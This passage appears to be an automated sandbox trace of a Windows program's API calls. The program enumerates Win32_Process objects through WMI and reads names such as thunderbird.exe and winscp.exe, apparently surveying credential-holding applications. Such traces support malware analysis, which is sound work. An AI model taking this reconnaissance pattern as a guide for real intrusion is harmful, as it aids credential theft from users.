Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.188] WbemDefPath:IUnknown:Release (This=0x561c0b8) returned 0x3 [0214.188] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.188] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.188] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630858, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.188] WbemDefPath:IUnknown:Release (This=0x5630858) returned 0x2 [0214.188] WbemDefPath:IUnknown:Release (This=0x5630858) returned 0x1 [0214.188] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.188] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.188] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630858, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5630858) returned 0x0 [0214.188] WbemDefPath:IUnknown:AddRef (This=0x5630858) returned 0x3 [0214.188] WbemDefPath:IUnknown:Release (This=0x5630858) returned 0x2 [0214.188] WbemDefPath:IWbemPath:SetText (This=0x5630858, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2992\"") returned 0x0 [0214.188] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.188] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.188] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.189] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.189] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.189] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.189] IWbemClassObject:Get (in: This=0x562e200, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268eedc*=0, plFlavor=0x268eee0*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="thunderbird.exe", varVal2=0x0), pType=0x268eedc*=8, plFlavor=0x268eee0*=0) returned 0x0 [0214.189] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0214.189] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0214.189] IWbemClassObject:Get (in: This=0x562e200, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268eedc*=8, plFlavor=0x268eee0*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="thunderbird.exe", varVal2=0x0), pType=0x268eedc*=8, plFlavor=0x268eee0*=0) returned 0x0 [0214.189] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0214.189] SysStringByteLen (bstr="thunderbird.exe") returned 0x1e [0214.189] CoTaskMemAlloc (cb=0x4) returned 0x561c0e8 [0214.189] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561c0e8, puReturned=0x267acc0 | out: apObjects=0x561c0e8*=0x562e398, puReturned=0x267acc0*=0x1) returned 0x0 [0214.190] IUnknown:QueryInterface (in: This=0x562e398, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562e398) returned 0x0 [0214.190] IUnknown:QueryInterface (in: This=0x562e398, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.190] IUnknown:QueryInterface (in: This=0x562e398, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.191] IUnknown:AddRef (This=0x562e398) returned 0x3 [0214.191] IUnknown:QueryInterface (in: This=0x562e398, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.191] IUnknown:QueryInterface (in: This=0x562e398, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.191] IUnknown:QueryInterface (in: This=0x562e398, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562e39c) returned 0x0 [0214.191] IMarshal:GetUnmarshalClass (in: This=0x562e39c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.191] IUnknown:Release (This=0x562e39c) returned 0x3 [0214.191] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.191] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.191] IUnknown:QueryInterface (in: This=0x562e398, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.191] IUnknown:Release (This=0x562e398) returned 0x2 [0214.191] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.191] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.191] IUnknown:QueryInterface (in: This=0x562e398, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562e398) returned 0x0 [0214.191] IUnknown:AddRef (This=0x562e398) returned 0x4 [0214.191] IUnknown:Release (This=0x562e398) returned 0x3 [0214.191] IUnknown:Release (This=0x562e398) returned 0x2 [0214.191] CoTaskMemFree (pv=0x561c0e8) [0214.192] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.192] IUnknown:AddRef (This=0x562e398) returned 0x3 [0214.192] IWbemClassObject:Get (in: This=0x562e398, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.192] IWbemClassObject:Get (in: This=0x562e398, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.192] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x66 [0214.192] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x66 [0214.192] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.192] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.193] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.193] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.193] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561c0e8) returned 0x0 [0214.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x561c0e8, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.194] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561c0e8, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5630938) returned 0x0 [0214.194] WbemDefPath:IUnknown:Release (This=0x561c0e8) returned 0x0 [0214.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630938, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5630938) returned 0x0 [0214.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630938, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.194] WbemDefPath:IUnknown:AddRef (This=0x5630938) returned 0x3 [0214.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630938, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630938, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: ppvObject=0x38e044*=0x0) returned 0x80004002 [0214.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630938, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e050 | out: ppvObject=0x38e050*=0x561c0f8) returned 0x0 [0214.194] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x561c0f8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e058 | out: pCid=0x38e058*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0214.194] WbemDefPath:IUnknown:Release (This=0x561c0f8) returned 0x3 [0214.194] CoGetContextToken (in: pToken=0x38e0b0 | out: pToken=0x38e0b0) returned 0x0 [0214.194] CoGetContextToken (in: pToken=0x38e4c4 | out: pToken=0x38e4c4) returned 0x0 [0214.194] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630938, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e544 | out: ppvObject=0x38e544*=0x0) returned 0x80004002 [0214.195] WbemDefPath:IUnknown:Release (This=0x5630938) returned 0x2 [0214.195] WbemDefPath:IUnknown:Release (This=0x5630938) returned 0x1 [0214.195] CoGetContextToken (in: pToken=0x38ee54 | out: pToken=0x38ee54) returned 0x0 [0214.195] CoGetContextToken (in: pToken=0x38edb4 | out: pToken=0x38edb4) returned 0x0 [0214.195] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630938, riid=0x38ee84*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ee80 | out: ppvObject=0x38ee80*=0x5630938) returned 0x0 [0214.195] WbemDefPath:IUnknown:AddRef (This=0x5630938) returned 0x3 [0214.195] WbemDefPath:IUnknown:Release (This=0x5630938) returned 0x2 [0214.195] WbemDefPath:IWbemPath:SetText (This=0x5630938, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3004\"") returned 0x0 [0214.195] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38f000 | out: puCount=0x38f000*=0x2) returned 0x0 [0214.195] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0x0, pszText=0x0 | out: puBuffLength=0x38effc*=0xf, pszText=0x0) returned 0x0 [0214.195] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38effc*=0xf, pszText="00000000000000" | out: puBuffLength=0x38effc*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.195] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x53abde8, puCount=0x38efcc | out: puCount=0x38efcc*=0x2) returned 0x0 [0214.195] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0x0, pszText=0x0 | out: puBuffLength=0x38efc8*=0xf, pszText=0x0) returned 0x0 [0214.195] WbemDefPath:IWbemPath:GetText (in: This=0x53abde8, lFlags=4, puBuffLength=0x38efc8*=0xf, pszText="00000000000000" | out: puBuffLength=0x38efc8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0214.195] IWbemClassObject:Get (in: This=0x562e398, wszName="Name", lFlags=0, pVal=0x38efc8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268f758*=0, plFlavor=0x268f75c*=0 | out: pVal=0x38efc8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winscp.exe", varVal2=0x0), pType=0x268f758*=8, plFlavor=0x268f75c*=0) returned 0x0 [0214.195] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0214.195] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0214.195] IWbemClassObject:Get (in: This=0x562e398, wszName="Name", lFlags=0, pVal=0x38efd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x268f758*=8, plFlavor=0x268f75c*=0 | out: pVal=0x38efd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="winscp.exe", varVal2=0x0), pType=0x268f758*=8, plFlavor=0x268f75c*=0) returned 0x0 [0214.195] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0214.196] SysStringByteLen (bstr="winscp.exe") returned 0x14 [0214.196] CoTaskMemAlloc (cb=0x4) returned 0x561c128 [0214.196] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x561c128, puReturned=0x267acc0 | out: apObjects=0x561c128*=0x562e530, puReturned=0x267acc0*=0x1) returned 0x0 [0214.359] IUnknown:QueryInterface (in: This=0x562e530, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e62c | out: ppvObject=0x38e62c*=0x562e530) returned 0x0 [0214.360] IUnknown:QueryInterface (in: This=0x562e530, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e5e0 | out: ppvObject=0x38e5e0*=0x0) returned 0x80004002 [0214.360] IUnknown:QueryInterface (in: This=0x562e530, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e408 | out: ppvObject=0x38e408*=0x0) returned 0x80004002 [0214.360] IUnknown:AddRef (This=0x562e530) returned 0x3 [0214.360] IUnknown:QueryInterface (in: This=0x562e530, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38df3c | out: ppvObject=0x38df3c*=0x0) returned 0x80004002 [0214.360] IUnknown:QueryInterface (in: This=0x562e530, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38deec | out: ppvObject=0x38deec*=0x0) returned 0x80004002 [0214.360] IUnknown:QueryInterface (in: This=0x562e530, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38def8 | out: ppvObject=0x38def8*=0x562e534) returned 0x0 [0214.360] IMarshal:GetUnmarshalClass (in: This=0x562e534, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df00 | out: pCid=0x38df00*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0214.360] IUnknown:Release (This=0x562e534) returned 0x3 [0214.360] CoGetContextToken (in: pToken=0x38df58 | out: pToken=0x38df58) returned 0x0 [0214.360] CoGetContextToken (in: pToken=0x38e36c | out: pToken=0x38e36c) returned 0x0 [0214.361] IUnknown:QueryInterface (in: This=0x562e530, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e3ec | out: ppvObject=0x38e3ec*=0x0) returned 0x80004002 [0214.361] IUnknown:Release (This=0x562e530) returned 0x2 [0214.361] CoGetContextToken (in: pToken=0x38e954 | out: pToken=0x38e954) returned 0x0 [0214.361] CoGetContextToken (in: pToken=0x38e8b4 | out: pToken=0x38e8b4) returned 0x0 [0214.361] IUnknown:QueryInterface (in: This=0x562e530, riid=0x38e984*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38e980 | out: ppvObject=0x38e980*=0x562e530) returned 0x0 [0214.361] IUnknown:AddRef (This=0x562e530) returned 0x4 [0214.361] IUnknown:Release (This=0x562e530) returned 0x3 [0214.361] IUnknown:Release (This=0x562e530) returned 0x2 [0214.361] CoTaskMemFree (pv=0x561c128) [0214.361] CoGetContextToken (in: pToken=0x38ecc4 | out: pToken=0x38ecc4) returned 0x0 [0214.361] IUnknown:AddRef (This=0x562e530) returned 0x3 [0214.361] IWbemClassObject:Get (in: This=0x562e530, wszName="__GENUS", lFlags=0, pVal=0x38efc4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f044*=0, plFlavor=0x38f040*=0 | out: pVal=0x38efc4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f044*=3, plFlavor=0x38f040*=64) returned 0x0 [0214.362] IWbemClassObject:Get (in: This=0x562e530, wszName="__PATH", lFlags=0, pVal=0x38efa8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f02c*=0, plFlavor=0x38f028*=0 | out: pVal=0x38efa8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"", varVal2=0x0), pType=0x38f02c*=8, plFlavor=0x38f028*=64) returned 0x0 [0214.362] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"") returned 0x66 [0214.362] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3012\"") returned 0x66 [0214.362] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38efd4 | out: ppv=0x38efd4*=0x6d0cac) returned 0x0 [0214.362] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38efcc | out: pAptType=0x38efcc*=1) returned 0x0 [0214.362] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38efd0 | out: ppvObject=0x38efd0*=0x0) returned 0x80004002 [0214.362] IUnknown:Release (This=0x6d0cac) returned 0x1 [0214.363] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e940 | out: ppv=0x38e940*=0x561c128) returned 0x0 [0214.363] WbemDefPath:IUnknown:QueryInterface (in: This=0x561c128, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38eb58 | out: ppvObject=0x38eb58*=0x0) returned 0x80004002 [0214.363] WbemDefPath:IClassFactory:CreateInstance (in: This=0x561c128, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eb64 | out: ppvObject=0x38eb64*=0x5630a18) returned 0x0 [0214.364] WbemDefPath:IUnknown:Release (This=0x561c128) returned 0x0 [0214.364] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630a18, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e784 | out: ppvObject=0x38e784*=0x5630a18) returned 0x0 [0214.364] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630a18, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x0) returned 0x80004002 [0214.364] WbemDefPath:IUnknown:AddRef (This=0x5630a18) returned 0x3 [0214.364] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630a18, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e094 | out: ppvObject=0x38e094*=0x0) returned 0x80004002 [0214.364] WbemDefPath:IUnknown:QueryInterface (in: This=0x5630a18, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e044 | out: 